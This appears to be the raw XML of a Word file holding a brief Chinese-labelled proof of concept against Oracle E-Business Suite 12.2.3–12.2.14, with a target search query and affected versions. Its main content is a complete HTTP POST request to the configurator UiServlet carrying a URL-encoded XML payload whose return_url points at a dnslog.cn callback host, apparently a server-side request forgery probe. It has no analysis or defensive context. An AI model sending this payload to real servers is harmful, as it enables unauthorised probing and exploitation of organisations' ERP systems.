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687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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF750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title="E-Business Suite"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2439F830">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FBD8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影响版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F2E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12.2.3-12.2.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29609A1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04384BEA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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>POST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/OA_HTML/configurator/UiServlet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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F66CE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</w:p>
    <w:p w14:paraId="03A0B6D2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Content-Type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/>
          <w:bCs/>
          <w:color w:val="6A5B6D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085E77F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</w:p>
    <w:p w14:paraId="4EC47FF5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redirectFromJsp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getUiType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%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Cinitialize%3E%0A%20%20%3Cparam%20name%3D%22init_was_saved%22%3Eesxdsd%3C%2Fparam%3E%0A%20%20%3Cparam%20name%3D%22return_url%22%3Ehttp%3A%2F%2F5k3vsb.dnslog.cn%3C%2Fparam%3E%0A%20%20%3Cparam%20name%3D%22ui_def_id%22%3E0%3C%2Fparam%3E%0A%20%20%3Cparam%20name%3D%22config_effective_usage_id%22%3E0%3C%2Fparam%3E%0A%20%20%3Cparam%20name%3D%22ui_type%22%3EApplet%3C%2Fparam%3E%0A%3C%2Finitialize%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C620864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</w:p>
    <w:p w14:paraId="673AD806">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697651D4"/>
    <w:p w14:paraId="0C27D9F8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92E98"/>
    <w:rsid w:val="0884014E"/>
    <w:rsid w:val="258C5A29"/>
    <w:rsid w:val="29D14727"/>
    <w:rsid w:val="2BA64F06"/>
    <w:rsid w:val="34920C8F"/>
    <w:rsid w:val="35286536"/>
    <w:rsid w:val="3E0D5D06"/>
    <w:rsid w:val="43EE0284"/>
    <w:rsid w:val="487A5B35"/>
    <w:rsid w:val="55EC038A"/>
    <w:rsid w:val="66990148"/>
    <w:rsid w:val="77C627D4"/>
    <w:rsid w:val="7D6F7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</Words>
  <Characters>630</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>635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2025-08-13T05:43:00Z</dcterms:created>
  <dc:creator>DELL</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:24:15Z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F9FF6050BAA2429EA654F0D999A88FF5_12</vt:lpwstr>
  </property>
</Properties>
</file>